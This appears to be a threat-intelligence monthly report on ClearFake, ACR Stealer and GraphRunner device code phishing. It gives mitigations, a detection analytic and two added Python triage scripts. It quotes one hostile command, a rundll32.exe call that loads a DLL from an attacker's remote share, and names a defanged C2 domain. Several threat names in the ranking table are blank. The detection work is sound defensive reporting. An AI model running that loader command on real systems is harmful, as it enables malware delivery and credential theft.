Highlights from April
Coming in at number 1 on this month’s top 10 most prevalent threat list is ClearFake, its first time claiming the top spot. ClearFake is an activity cluster that uses JavaScript injected into compromised websites to deliver malware via drive-by download techniques, often using fake CAPTCHA lures to trick users into executing code via malicious copy and paste (paste and run, ClickFix, fakeCAPTCHA). Since its debut on our list in February 2026, ClearFake has stayed in the top 3, in large part due to the ongoing effectiveness of paste and run as an initial execution technique. ClearFake has delivered multiple payloads over time, including ArechClient2 and LummaC2; most recently, we’ve observed ACR Stealer, which debuts in this month’s top 10.
ACR Stealer, a malware-as-a-service (MaaS) information stealer written in C++ that has been active since 2024, makes its debut in a tie for 6th thanks to its use as a payload in recent ClearFake campaigns. You can read more about this threat below.
Also debuting in our top 10 and sharing the tie for 6th place is GraphRunner, a post-exploitation toolkit that uses the Microsoft Graph API to conduct reconnaissance, maintain persistence, and exfiltrate data via Entra ID accounts. While GraphRunner is intended for legitimate security testing and red team operations, adversaries can also abuse its capabilities for malicious activities across Outlook, SharePoint, OneDrive, and Teams.
Red Canary and other researchers have seen a recent surge in OAuth device code abuse, where adversaries use tools—including GraphRunner—to exploit legitimate login portals to trick users into completing a device authentication grant. Successful completion yields valid access and refresh tokens that carry a satisfied MFA claim, bypass many conditional access policies, and can be exchanged across first-party Microsoft applications to expand scope without re-authentication. Similar tradecraft has been commoditized by phishing-as-a-service (PhaaS) platforms like Kali365 and EvilTokens, which package the same device code abuse into subscription-based affiliate offerings.
Some of our mitigation recommendations for this kind of activity include:
- Block device code flows: Implement conditional access policies that lock down device code flows. This is one of the most effective controls to prevent device code phishing. It is rare for users to need device code authentication to perform their duties, so the impact on users should be minimal.
- Harden device joining: Adversaries have been observed joining their devices to maintain persistence and bypass stricter conditional access policies. We recommend limiting this permission strictly to groups that need to join Entra devices as part of their duties.
- Implement continuous access evaluation: Consider implementing continuous access evaluation (CAE) to enforce existing location-based conditional access policies in near real time.
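The mitigations above reduce exposure; the complementary detection task is to find device code grants that did happen. The following is an added example, not Red Canary's or Microsoft's code: it triages sign-in records for device code authentications and flags those from a user who has no business need for the flow, from a country absent from that user's other sign-ins, or where no conditional access policy applied. The records are constructed and follow the shape of the Microsoft Graph `signIn` resource, where `authenticationProtocol` is `deviceCode` for a device code flow sign-in; the field names are assumed to be exported in that shape.

```python
"""Triage Microsoft Entra ID sign-in records for OAuth device code grants.

Added example; the sign-in records below are constructed, not real
telemetry. They follow the shape of the Microsoft Graph `signIn`
resource, where `authenticationProtocol` is "deviceCode" for a
device code flow sign-in (assumption: logs exported in that shape).
"""
from collections import defaultdict

SAMPLE_SIGNINS = [
    # Ordinary browser sign-ins that establish where each user normally logs in from
    {"id": "s0", "userPrincipalName": "alice@example.test", "authenticationProtocol": "oAuth2",
     "ipAddress": "203.0.113.10", "location": {"countryOrRegion": "US"},
     "appDisplayName": "Microsoft Office", "conditionalAccessStatus": "success"},
    {"id": "s1", "userPrincipalName": "bob@example.test", "authenticationProtocol": "oAuth2",
     "ipAddress": "203.0.113.20", "location": {"countryOrRegion": "US"},
     "appDisplayName": "Microsoft Office", "conditionalAccessStatus": "success"},
    # Device code grant for alice from a country she has never signed in from,
    # with no conditional access policy applied: the pattern of a device code phish
    {"id": "s2", "userPrincipalName": "alice@example.test", "authenticationProtocol": "deviceCode",
     "ipAddress": "198.51.100.77", "location": {"countryOrRegion": "NL"},
     "appDisplayName": "Microsoft Azure CLI", "conditionalAccessStatus": "notApplied"},
    # Device code grant by an admin who is expected to use it, from his usual country
    {"id": "s3", "userPrincipalName": "bob@example.test", "authenticationProtocol": "deviceCode",
     "ipAddress": "203.0.113.20", "location": {"countryOrRegion": "US"},
     "appDisplayName": "Microsoft Azure CLI", "conditionalAccessStatus": "success"},
]


def build_country_baseline(records):
    """Map each user to the countries seen in their non-device-code sign-ins."""
    baseline = defaultdict(set)
    for rec in records:
        if rec.get("authenticationProtocol") != "deviceCode":
            baseline[rec["userPrincipalName"]].add(rec.get("location", {}).get("countryOrRegion"))
    return baseline


def triage_device_code_signins(records, expected_users=frozenset()):
    """Return {sign-in id: [reasons]} for device code sign-ins worth a second look.

    expected_users: principals whose duties legitimately require device code
    authentication (for everyone else the control is to block the flow outright).
    """
    baseline = build_country_baseline(records)
    findings = {}
    for rec in records:
        if rec.get("authenticationProtocol") != "deviceCode":
            continue
        user = rec["userPrincipalName"]
        country = rec.get("location", {}).get("countryOrRegion")
        reasons = []
        if user not in expected_users:
            reasons.append("device code flow used by a user not expected to need it")
        if country not in baseline.get(user, set()):
            reasons.append(f"sign-in country {country} not seen in the user's other sign-ins")
        # A token carrying a satisfied MFA claim that no policy ever evaluated is
        # exactly what device code phishing yields, so anything but "success" is a reason.
        if rec.get("conditionalAccessStatus") != "success":
            reasons.append(f"conditional access status: {rec.get('conditionalAccessStatus')}")
        if reasons:
            findings[rec["id"]] = reasons
    return findings


if __name__ == "__main__":
    for sid, reasons in triage_device_code_signins(SAMPLE_SIGNINS, {"bob@example.test"}).items():
        print(sid, *reasons, sep="\n  ")
```

Run against the constructed records with `bob@example.test` as the only expected device code user, only `s2` is returned, with all three reasons; drop the allowlist and `s3` surfaces too, on the single ground that its user was not expected to use the flow.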
| Month's rank | Threat name | Threat description |
|---|---|---|
| ⬆ 1 | ClearFake | Activity cluster that uses JavaScript injected into compromised websites to deliver malware via drive-by download techniques, often using fake CAPTCHA lures to trick users into executing code via malicious copy and paste |
| ⬆ 2* | | Information stealer designed to target data within web browsers and locally stored files on macOS systems, with the goal of accessing sensitive information including credentials, payment card data, keychain details, and cryptocurrency wallets |
| ⬆ 2* | | Legitimate ConnectWise product that administrators use and adversaries abuse to remotely access and manage devices |
| ➡ 4 | | macOS threat designed with the goal of accessing sensitive information including credentials, payment card data, keychain details, and cryptocurrency wallets |
| ➡ 5 | | Red Canary's name for an activity cluster that uses compromised websites to trick users into executing malicious code |
| ⬆ 6* | ACR Stealer | Malware-as-a-service (MaaS) information stealer written in C++ that has been active since 2024 |
| ⬆ 6* | GraphRunner | Post-exploitation toolset for interacting with the Microsoft Graph API, enabling reconnaissance, persistence, and data exfiltration from Microsoft Entra ID accounts |
| ⬆ 8 | | Traffic distribution system, first observed in 2024, that uses compromised WordPress sites to deploy malicious code that may lead to malware families such as Rhysida and Interlock ransomware, D3F@ck Loader, Mocha Manakin, Mintsloader, and WARMCOOKIE |
| ⬆ 9* | | Campaign involving the account takeover attack of the widely-used npm package axios on March 30, 2026, which resulted in two malicious versions being propagated through automated updates |
| ⬇ 9* | | Legitimate remote access tool (RAT) that can be used as a trojan by adversaries to remotely control victim endpoints for unauthorized access |
| ⬆ 9* | | Malware used to steal credentials and other data |
⬆ = trending up from previous month
⬇ = trending down from previous month
➡ = no change in rank from previous month
*Denotes a tie
All about ACR Stealer
Also known as Amatera, ACR Stealer is marketed on Russian-speaking cybercrime forums by a threat actor named “SheldIO” and is assessed to be an updated version of GrMsk Stealer. ACR Stealer has several capabilities beyond its information stealing functions, including reconnaissance, anti-analysis checks, and keylogging. It can also download and execute additional payloads.
ACR Stealer has been delivered via ClearFake campaigns leveraging paste and run for initial execution since at least March 2025. One such campaign we observed in April 2026 used fake Claude Code GitLab pages like claude-desktop[.]gitlab[.]io to trick users into following malicious copy and paste instructions under the guise of installing Claude Code.
ClearFake paste and run lure, image from https://www.trendmicro.com/en_us/research/26/e/installfix-and-claude-code.html
In another campaign we observed in April 2026, the adversary behind ACR Stealer distributed it wrapped in a Go-based reflective loader to sideload a malicious DLL via rundll32.exe. This command seen early in the execution chain attempts to load a DLL from a remote network share:
```
"C:\Windows\system32\rundll32.exe" \\sphere-api.dialectosphere.in[.]net\05fe317c-0981-4de2-bc8a-930d369db441\ck-3d80df5d12cdfe6450a782fc87bf66b444.google,#1"
```
Once successfully downloaded, the primary ACR Stealer DLL loads and executes in memory. One indicator of successful ACR Stealer execution is outbound command and control (C2) communication to related infrastructure, for example cw.compactedtightness[.]cfd (VirusTotal), often originating from rundll32.exe.
One example of delivery and execution of ACR Stealer in April 2026
ACR Stealer’s use of rundll32.exe to make outbound network connections gives us a detection opportunity.
Detection opportunity: rundll32.exe executing without any command-line parameters and establishing a network connection
This pseudo-detection analytic identifies rundll32.exe executing without any command-line parameters and establishing a network connection. It is highly unusual for rundll32.exe to execute without any command-line parameters present and with a network connection. This behavior is not inherently evil, but is common behavior in the execution of malware, including ACR Stealer. Additional investigation should focus on any network connections, the surrounding processes, and potential injection into rundll32.exe.
```
process == (rundll32.exe)
&&
command_line_includes ("")*
&&
has_network_connection
```
Note: "" indicates a blank command line.
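As an added example (not Red Canary's detection code), the pseudo-analytic above implemented over constructed endpoint telemetry. The one detail the pseudo-code glosses over is what "blank" means when the logged command line still contains the program path, possibly quoted, so the code splits the program token from its arguments before testing for emptiness. It also goes one step beyond the analytic in the text with a second check for rundll32.exe being handed a DLL on a remote UNC share, as in the loader command quoted earlier in the section. The events are constructed: the C2 domain is the defanged one named in the text, and the UNC share host is a placeholder.

```python
"""Evaluate the rundll32.exe analytic over constructed endpoint telemetry.

Added example, not Red Canary's detection code. Events are constructed;
the C2 domain is the defanged one quoted in the text, and the UNC path
host is a placeholder.
"""
import re
from dataclasses import dataclass, field


@dataclass
class ProcessEvent:
    pid: int
    image: str                        # full path of the executable
    command_line: str                 # raw command line as logged
    remote_hosts: list = field(default_factory=list)  # destinations of outbound connections


def split_command_line(command_line):
    """Split a Windows command line into (program, arguments).

    The program token may be wrapped in double quotes; everything after it is
    the argument string. An empty argument string is what the analytic's
    command_line_includes("") refers to, even though the program path is present.
    """
    cl = command_line.strip()
    if cl.startswith('"'):
        end = cl.find('"', 1)
        if end == -1:
            return cl[1:], ""
        return cl[1:end], cl[end + 1:].strip()
    parts = cl.split(None, 1)
    program = parts[0] if parts else ""
    args = parts[1].strip() if len(parts) > 1 else ""
    return program, args


def is_rundll32(event):
    return event.image.rsplit("\\", 1)[-1].lower() == "rundll32.exe"


def blank_rundll32_with_network(event):
    """The analytic from the text: rundll32.exe, no arguments, outbound connection."""
    if not is_rundll32(event):
        return False
    _, args = split_command_line(event.command_line)
    return args == "" and len(event.remote_hosts) > 0


# Two leading backslashes, a host name, then a backslash: the start of a UNC path
UNC_PATH = re.compile(r"^\\\\[^\\\s]+\\")


def rundll32_unc_load(event):
    """Extension: rundll32.exe asked to load a DLL from a remote share."""
    if not is_rundll32(event):
        return False
    _, args = split_command_line(event.command_line)
    return UNC_PATH.match(args) is not None


def evaluate(events):
    """Return (pid, analytic name) for every event that trips an analytic."""
    hits = []
    for ev in events:
        if rundll32_unc_load(ev):
            hits.append((ev.pid, "rundll32_unc_dll_load"))
        if blank_rundll32_with_network(ev):
            hits.append((ev.pid, "rundll32_blank_cmdline_network"))
    return hits


SAMPLE_EVENTS = [
    # Loader stage: rundll32 told to load a DLL from a remote share (placeholder host)
    ProcessEvent(5000, r"C:\Windows\system32\rundll32.exe",
                 r'"C:\Windows\system32\rundll32.exe" \\share.placeholder.test\00000000-0000-0000-0000-000000000000\payload.google,#1'),
    # Stealer stage: rundll32 with a bare command line beaconing to the C2 domain named in the text
    ProcessEvent(4120, r"C:\Windows\system32\rundll32.exe",
                 r'"C:\Windows\system32\rundll32.exe"', ["cw.compactedtightness[.]cfd"]),
    # Benign: Control Panel launched through rundll32 with normal arguments and no network
    ProcessEvent(3312, r"C:\Windows\system32\rundll32.exe",
                 r"rundll32.exe shell32.dll,Control_RunDLL"),
    # Out of scope: a different binary with a bare command line and a connection
    ProcessEvent(6000, r"C:\Windows\system32\svchost.exe",
                 r"C:\Windows\system32\svchost.exe", ["203.0.113.5"]),
]


if __name__ == "__main__":
    for pid, name in evaluate(SAMPLE_EVENTS):
        print(f"pid {pid}: {name}")
```

Against the constructed events, pid 5000 trips the UNC check and pid 4120 trips the blank-command-line analytic, while the Control Panel launch and the svchost process produce nothing. The hits are the starting point for the investigation the text describes: the remote hosts on the flagged process, its parent and siblings, and whether anything injected into it.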